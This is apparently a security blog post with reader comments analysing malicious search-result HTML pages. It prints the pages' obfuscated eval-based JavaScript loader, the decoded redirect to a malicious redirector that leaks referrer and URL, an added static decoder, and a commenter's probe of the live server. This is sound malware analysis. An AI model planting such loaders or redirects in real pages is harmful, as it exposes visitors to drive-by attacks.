
More malicious search results

One of my co-workers just learned that there is a malicious HTML page with his name on it! When I downloaded the page, we realized that it was not a targeted attack but a variant of the malicious pages I reported in my MSN malicious results post.

This server actually hosted 3179 other HTML pages, each one with a name starting with Ryan-. The bad guys probably used a robot to collect information from web pages. More information here...

The script looks like the one reported before:

function zrwe(yry,dtj){if(!dtj){dtj='SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0';}var y;var OR='';for(var vadz=0;vadz16,(y&65280)>>8,y&255);}eval(OR.substring(0,OR.length-3));}zrwe('2X-uHEPBVIlctXfWNhPuzhJutXP}HJJKKKLTN9vWod&cVB2B2bmcyIl3yIJ}HRv-tBrutXPAVX-uVIF+N4.Bw+vGNG*82hlmVRvsoXQWVR6gFT*3Hda*VRrlke*ctI.gNTHW1RD-zhjIoXJcoIJIzK6?HhmnyXv-JJwwrXPAoEPuHhmWCEvctBJAHhmWV+w-HIJboIJbCKQTw+DsoIfAHRv-onW}NXJm2XPbHeHGH4W}oX;I2R6PaKH6JfvrR*wfv}JKvJ6P6TA-yIFcHEJJ;}-dyX*jyXm-y+r&HEPn2h*-y+ruJJwaCKQTwIv-HIf*y9v{NXJm2XPbHd*thfLTC4QL6eSL6SSS');
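To make the decoding step concrete, here is an added example in JavaScript (not code from the original post, and not the malware author's tool): it reimplements the decoder using the sample's own 64-character alphabet, then pulls the redirect host, the campaign tag (tsk=) and the leaked document properties out of the decoded stage statically, instead of handing it to eval(). The bit layout of the decoder loop is an assumption, because that part of the script was lost when the page was extracted; the encoded sample below is constructed with a placeholder host, and the encoder exists only to build it.

```javascript
// Added example (not code from the original post): a stand-alone decoder for the
// custom-alphabet base64 scheme the sample's zrwe() function appears to use,
// followed by a static extractor for the redirect target of the decoded stage.
//
// ASSUMPTION: the loop body lost during page extraction packs four alphabet
// indices into one 24-bit value (ordinary base64 layout) before emitting three
// bytes with String.fromCharCode(y>>16, (y&65280)>>8, y&255), as the surviving
// fragment suggests. Verified only against the constructed sample below, not
// against the real encoded blob on the page.

// The 64-character alphabet string from the sample (the dtj default).
const ALPHABET = 'SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0';

// A usable alphabet has exactly 64 distinct characters; anything else means
// the decoder cannot be a bijection and the output will be noise.
function alphabetIsValid(alphabet) {
  return alphabet.length === 64 && new Set(alphabet).size === 64;
}

// Decode: four alphabet indices -> one 24-bit value -> three bytes.
// Characters outside the alphabet, or past the end, contribute zero bits.
function customB64Decode(encoded, alphabet = ALPHABET) {
  let out = '';
  for (let i = 0; i < encoded.length; i += 4) {
    let y = 0;
    for (let j = 0; j < 4; j++) {
      const ch = encoded.charAt(i + j);
      const idx = ch === '' ? 0 : Math.max(alphabet.indexOf(ch), 0);
      y = (y << 6) | idx;
    }
    out += String.fromCharCode(y >> 16, (y & 65280) >> 8, y & 255);
  }
  return out;
}

// Encoder used only to build the test sample: the inverse of the decoder above.
function customB64Encode(text, alphabet = ALPHABET) {
  let out = '';
  for (let i = 0; i < text.length; i += 3) {
    const b = [0, 1, 2].map(k => (i + k < text.length ? text.charCodeAt(i + k) & 255 : 0));
    const y = (b[0] << 16) | (b[1] << 8) | b[2];
    out += alphabet[(y >> 18) & 63] + alphabet[(y >> 12) & 63] +
           alphabet[(y >> 6) & 63] + alphabet[y & 63];
  }
  return out;
}

// Static extraction of the redirect target. The decoded stage on the page has
// the shape  window.location=encodeURI("http://host/in.cgi?7&tsk=...&seoref="+
// encodeURIComponent(document.referrer)+...), so the first string literal
// gives the redirector and campaign tag, and the property names that follow
// show what the page leaks to it. Nothing here executes the stage.
function extractRedirect(stageSource) {
  const m = /window\.location\s*=\s*encodeURI\(\s*(['"])(.*?)\1/.exec(stageSource);
  if (!m) return null;
  const literal = m[2];
  const q = literal.indexOf('?');
  const base = q < 0 ? literal : literal.slice(0, q);
  const query = q < 0 ? '' : literal.slice(q + 1);
  const params = {};
  for (const pair of query.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    params[eq < 0 ? pair : pair.slice(0, eq)] = eq < 0 ? '' : pair.slice(eq + 1);
  }
  const leaked = ['document.referrer', 'document.URL'].filter(p => stageSource.includes(p));
  return { base, params, leaked };
}

// Full pipeline: decode, drop the zero padding bytes, analyse statically.
function analyseSample(encoded, alphabet = ALPHABET) {
  const stage = customB64Decode(encoded, alphabet).replace(/\0+$/, '');
  return { stage, redirect: extractRedirect(stage) };
}

// Constructed sample: the redirect stage decoded in the post, re-encoded with
// the same alphabet. The host is a placeholder (the real one is a live
// redirector); the campaign tag and parameter names are the ones on the page.
const SAMPLE_STAGE =
  'window.location=encodeURI("http://redirector.example/in.cgi?7' +
  '&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref="' +
  '+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1' +
  '&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=XXX");';
const SAMPLE_ENCODED = customB64Encode(SAMPLE_STAGE);

console.log(JSON.stringify(analyseSample(SAMPLE_ENCODED), null, 2));
```

When the decoder loop of a sample survives intact, the quicker route is to run it with eval replaced by a function that stores its argument; it is reimplemented here only because the loop body did not survive extraction. extractRedirect() deliberately never executes the decoded stage, which matters when a second stage does more than redirect.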

Have you tried to deobfuscate this yet?

V.

And it translates into:

window.location=encodeURI("hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=XXX");

See the full post here

Nice!

Nice! Is there an obfuscation engine? If there is, have you got the link?
Would you post the cached link from Google?
Oh, hey! This IS the engine, isn't it?
Please try: http://blog.grospolina.net/archives/6-MSN-cache-hilft-beim-Verbreiten-von-malware.html
It's in German, but I hope you will acknowledge that it's the same thing we were talking about.

Big thanks for posting this article.

---
"Destroy him! He is only a USER!" (MCP)

redirection engine?

Well, I tried htgp://www.onlinedetect.com/in.cgi?545&muuh

and I received:

Error: 'can't open redirects.log file'

head:
HTTP/1.1 200 OK
Date: Wed, 30 Jul 2008 01:50:37 GMT
Server: Apache/2.2.8 (Fedora)
Connection: close
Content-Type: text/plain; charset=UTF-8

Interesting thing?
---
"Destroy him! He is only a USER!" (MCP)